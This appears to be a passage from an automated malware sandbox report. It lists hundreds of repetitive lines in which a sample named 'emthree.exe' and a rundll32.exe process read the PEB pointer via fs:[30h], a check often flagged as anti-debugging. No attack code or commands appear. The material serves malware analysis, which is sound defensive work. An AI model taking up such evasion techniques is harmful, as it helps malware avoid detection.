          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0106A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01014D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01014D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01014D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01023D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01063540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01093D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01007D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01011DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01011DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01011DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01098DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01067794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01067794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01067794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01018E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0109FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01028EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0109FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F78CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EC746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F58DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F62D82 mov eax, dword ptr fs:[00000030h]
